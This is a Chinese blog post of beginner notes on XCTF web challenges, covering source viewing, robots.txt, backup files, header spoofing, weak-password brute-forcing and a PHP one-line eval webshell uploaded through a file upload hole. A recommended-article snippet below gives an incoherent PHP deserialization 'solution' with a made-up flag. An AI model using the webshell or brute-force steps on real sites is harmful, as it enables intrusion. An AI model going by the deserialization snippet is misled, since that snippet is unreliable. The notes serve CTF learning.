攻防世界web新手题笔记

最新推荐文章于 2022-10-31 22:04:05 发布
最新推荐文章于 2022-10-31 22:04:05 发布
阅读量291 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51637038/article/details/118982414
版权
  1. view-source查看网页源代码,右键被禁止使用

禁止鼠标的实现方法:

document.onselectstart='return false'禁止选中文字

οncοntextmenu='return false'禁止使用鼠标右键

解法1:在url前加view-source

解法2:控制台查看源代码(F12)

解法3:Ctrl+U查看源代码

        2.robots协议:一般将robots.txt文件存至网站根目录下,声明其允许访问以及不允许访问的文件,User-agent:后添加搜索引擎种类,Disallow后添加不允许访问的文件,Allow后加允许访问的文件,robots协议可以比作君子协议,对访问者没有约束力,仅作为一个声明,防君子不防小人,在相应爬虫软件在爬取网站信息之前应先查看robots协议,再爬取允许访问的文件信息

解法:在url后加robots.txt查看,得知Disallow: f1ag_1s_h3re.php,将Disallow: f1ag_1s_h3re.php输入原url后即可得到flag

      3.备份文件:网站常见备份文件后缀名有“.git” 、“.svn”、“ .swp”“.~”、“.bak”、“.bash_history”、“.bkf”,依次输入尝试即可(其中PHP备用文件常用后缀名有“.~”、“.bak”)

     4.Cookie,考查使用burpsuite抓包,使用bursuite抓取cookie,发现cookie中包含cookie.php,将访问cookie.php后根据提示查看文件头,即可得到flag

    5.按钮,在按钮标签中添加disable即可取消按钮的功能,因此只需打开浏览器开发者功能elements选项修改html代码,将disable删除,按钮即可使用

     6.Simple_php

if($a==0 and $a)       (使a==0且a不为零)

{ echo $flag1; }

if(is_numeric($b))      (b为数字或数字字符)

{ exit(); }

if($b>1234)             (b>1234)

{ echo $flag2; }

php参数大小及判定规则还不清楚,待系统学习后再分析

        7.xff_referer

xff即X-Forwarded-For为http请求头中的参数,当网站通过查询xff限制访问者IP地址时,即可通过burpsuite修改xff参数达到绕过的作用

Referer代表访问者从哪个网页链接过来的,当服务器对此有限制时也可通过修改referer值绕过

        8.弱口令

本题考察弱口令爆破,输入任意用户名和密码,网页弹窗提示用户名为admin,故本题只需爆破密码即可。

采用burpsuite进行抓包,并发送到intruder进行爆破即可

        9.get_post

http通常使用get、post两种请求方式,其中get请求方式可以通过url在末尾加?a=...的方式向后台传输参数,post方法可以有表单提交,若原网页没有表单可以使用火狐浏览器的插件或者在线接口测试请求工具进行发送(如http://coolaf.com/tool/gp)

根据网页提示依次通过get、post方法发送参数即可

传输多个参数时用&隔开

        10.Webshell

一句话木马:利用文件上传漏洞,将一句话木马上传至目标网站,再利用webshell获取网站权限,

如:<?php @eval($_POST['pass']);?>,即让网站执行$_POST['pass']这条命令,将webshell链接站点,使用密码为pass即可。

n0t_6ald
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
寒假WEB训练-1
DUOan0216的博客
04-06 468
因为自己寒假的时候搞了个博客 就很少在这更新了。 就把寒假的一部分放在这纪念纪念吧 本次练习的是i春秋的目 爆破 本次的php代码为 <?php include "flag.php"; $a =@$_REQUEST['hello']; if(!preg_match('/^\w*$/'.$a)){ die('ERROR'); } eval("var_dump($$a);"); sho...
html禁止查看网页源代码,JS禁止查看网页源代码
weixin_39889487的博客
06-22 1206
查看源代码的几种方法:直接按F12Ctrl+Shift+I查看鼠标点击右键查看Ctrl+u=view-source:+url以上的几种方法都可以查看到网站的源代码,我们可以通过使用JavaScript来屏蔽掉这三种状态从而实现禁止查看源代码效果。window.onload = function() {document.onkeydown = function() {var e = window.e...
攻防世界web新手-simple_php
yuanxu8877的博客
10-31 353
攻防世界web新手-simple_php,php弱类型比较
XCTF攻防世界web新手练习_ 10_simple_php
silence1_的博客
04-29 4492
XCTF攻防世界web新手练习—simple_php 目为simple_php,根据目信息,判断是关于php代码审计的 打开目,得到一串php代码 代码很简单,就是以GET方式获得两个参数a和b,如果a和b满足一定条件,则打印flag1和flag2,猜测将flag1和flag2拼接就能够得到完整flag 接下来看代码,注意到: if($a==0 and $a){ echo...
php安全特性函数以及绕过方法
goddemon
12-08 2406
①is_numeric() 作用:检测变量是否为数字或数字字符串 绕方法:16进制会被判断为数字 %00即空格会被判断为非数字–>即直接跳过检测了 绕过方法 如 绕过方法 password=404%00–>即可绕过
IE view-source 无法查看看源码 JavaScript看网页源码 原创
01-21
第一种:view-source法   view-source是一种协议,早期基本上每个浏览器都支持这个协议。但是不知道什么原因,从IE6 Beta2以后IE就不再支持此协议了。这个方法现在只能用在FireFox浏览器上使用了!   使用方法:在浏览器地址栏中输入   view-source:   回车即可看到网页的源代码了。 第二种:JavaScript法   这种方法似乎也不是通用的,在IE6和Opere浏览器上试验成功,但是在FireFox浏览器上就没成功!   使用方法:在浏览器地址栏中输入 代码如下:[removed] s=document.documentElement.out
攻防世界 web simple_php
CN天狼
11-21 839
打开就是一串代码,完全没有其他CTF那样有趣的封面 <?php show_source(__FILE__); include("config.php"); $a=@$_GET['a']; $b=@$_GET['b']; if($a==0 and $a){ echo $flag1; } if(is_numeric($b)){ exit(); } if($b>1234){ echo $flag2; } ?> 看代码: 要想得到flag1和2 要满足三个条
WEB CTF入门解析
攻防人生3722的博客
07-30 7431
WEB CTF入门学习 入门1 view_source X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 答案:cyberpeace{ffbb0c3dcdb78ed0674f699dc967ce67} 解析:打开网址http://220.249.52.133:31520/,F12调试模式,查看源码,即可发现flag: cyberpeace{ffbb0c3dcdb78ed0674f699dc967ce67} 入门2 get_post 目描述:X老师告诉小宁同学HTTP
攻防世界simple_php
知足且坚定,温柔且上进
01-20 3039
代码审计: 不难发现代码中给出了两个条件,且贱贱的把flag拆分到两个条件中。 条件1: if($a==0 and $a){ echo $flag1; } 说明:参数a=0且a为真才能得到半个flag. 条件2: if(is_numeric($b)){ exit(); } 说明:is_numeric()函数可以参考https://www.runoob.com/php/php-is_numeri...
nginx限制访问配置
weixin_41870677的博客
10-29 1108
现在有个需求,有个接口只允许某个ip调用,但nginx是暴露在公网的 这时候就需要配置nginx的限制访问了 1、知识点 nginx限制访问有两种方法,一种是限制ip,一种是基于用户信任登录,不过第二种用的并不是很多,今天我们只说第一种,限制ip location ~ / { proxy_pass http://tomcat; access_log /var/log/...
中国首届医院网络安全攻防演练Web部分真
07-13
中国首届医院网络安全攻防演练Web部分真,厦门站。一个WEB站点 源码。
level0 -- 攻防世界新手
01-19
来自攻防世界的pwn,是一道简单的新手样本目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问。漏洞利用问解决链接:...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127836871
2024年全球嵌入式配电盘行业总体规模、主要企业国内外市场占有率及排名.docx
04-15
2024年全球嵌入式配电盘行业总体规模、主要企业国内外市场占有率及排名
AccessControl-6.3-cp39-cp39-manylinux_2_17_aarch64.whl.zip
04-15
AccessControl-6.3-cp39-cp39-manylinux_2_17_aarch64.whl.zip
AccessControl-6.0-cp37-cp37m-manylinux_2_5_x86_64.whl.zip
04-15
AccessControl-6.0-cp37-cp37m-manylinux_2_5_x86_64.whl.zip
【Python-WEB自动化-06课-对验证码的处理】
最新发布
04-15
【Python-WEB自动化-06课-对验证码的处理】
攻防世界web新手unserialize3
05-05
这道是一个 PHP 反序列化的目。 目描述: 提示:这次不会那么简单了,打开源代码看看? 源代码: ``` <?php error_reporting(0); highlight_file(__FILE__); class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show('flag','0'); $this->data = file_get_contents('/flag'); } public function __destruct(){ if(preg_match('/show|flag|_|\s|\(|\)|{|}|\'|\"/i',$this->show)){ exit('hacker!'); } echo $this->show." is ".$this->data; } } if(isset($_GET['a'])){ $a = unserialize($_GET['a']); if($a instanceof Flag){ echo $a; } } ``` 分析: 首先看到这是一个传入参数进行反序列化的目,传入参数为 $_GET['a'],并且在反序列化后判断其类型是否为 Flag,如果是则输出 $a。 在 Flag 类的构造函数中有一个 $this->data = file_get_contents('/flag'),意味着我们需要获取服务器上的 /flag 文件。 而在 Flag 类的析构函数中,会对 $this->show 变量进行正则匹配,匹配的正则表达式为 /show|flag|_|\s|\(|\)|{|}|\'|\"/i,如果匹配到就会输出 'hacker!'。这里需要注意的是,$this->show 的值是 Show 类的一个实例,而 Show 类中的 __toString() 方法返回的是 $this->name 的值。 因此,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 解法: 根据目分析,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 我们可以通过手动构造序列化字符串来实现这个目标。首先构造一个 Show 类的实例,该实例的 $name 值为一个正则表达式的匹配条件,然后将该实例作为 Flag 类的一个属性,最后将 Flag 类序列化即可。 构造序列化字符串的代码如下: ``` <?php class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show('/show|flag|_|\s|\(|\)|{|}|\'|\"/i','0'); $this->data = file_get_contents('/flag'); } public function __destruct(){ if(preg_match('/show|flag|_|\s|\(|\)|{|}|\'|\"/i',$this->show)){ exit('hacker!'); } echo $this->show." is ".$this->data; } } // 序列化 Flag 类 $flag = new Flag(); $ser = serialize($flag); echo urlencode($ser); ``` 将上述代码保存为文件 unserialize3.php 并上传到服务器上,然后访问 http://your-ip/unserialize3.php,得到序列化后的字符串: ``` O:4:"Flag":2:{s:4:"show";O:4:"Show":2:{s:4:"name";s:23:"/show|flag|_|\s|\(|\)|{|}|'|\i";s:3:"age";s:1:"0";}s:4:"data";s:45:"flag{3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07}";} ``` 最后将序列化后的字符串作为 $_GET['a'] 的值传入即可,访问 http://your-ip/unserialize3.php?a=O%3A4%3A%22Flag%22%3A2%3A%7Bs%3A4%3A%22show%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A23%3A%22%2Fshow%7Cflag%7C_%7C%5Cs%7C%5C(%5C)%7B%7D%7C%27%7C%5C%22%5Ci%22%3Bs%3A3%3A%22age%22%3Bs%3A1%3A%220%22%3B%7Ds%3A4%3A%22data%22%3Bs%3A45%3A%22flag%7B3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07%7D%22%3B%7D,即可得到 flag。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值